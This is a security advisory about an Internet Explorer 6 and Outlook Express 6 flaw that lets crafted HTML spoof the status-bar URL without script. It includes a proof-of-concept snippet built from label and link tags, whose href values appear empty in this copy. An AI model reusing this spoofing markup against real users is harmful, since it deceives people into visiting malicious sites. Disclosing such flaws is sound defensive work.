bitlance winter has discovered a weakness in Internet Explorer/Outlook Express, which can be exploited by malicious people to trick users into visiting a malicious web site by obfuscating URLs.
It is by default possible for script code to manipulate information displayed
in the status bar. However, an error allows manipulation of the status bar without
using any script code (e.g. in the "Restricted sites" zone).
This can be exploited by including a "label" tag for a link, which manipulates
the link's appearance via some specially crafted HTML code.
This weakness is a variant of:
http://www.securityteam.us/article.php/20041029161335842
Example:
Code:
<p><a id="SPOOF" href=""></a></p> <div> <a href=""> <table> <caption> <a href=""> <label for="SPOOF"> <u style="cursor: pointer; color: blue"> </u> </label> </a> </caption> </table> </a> </div>
The weakness has been confirmed in version 6.0 on a fully patched system running Windows XP with SP2 installed. Other versions may also be affected.
SOFTWARE:
Microsoft Outlook Express 6
Microsoft Internet Explorer 6
SOLUTION:
Never follow links from untrusted sources.
PROVIDED AND/OR DISCOVERED BY:
bitlance winter
VERIFY ADVISORY:
http://secunia.com/advisories/14304/
Secunia Security Advisories
http://community.securityteam.us/article.php/20050217095815913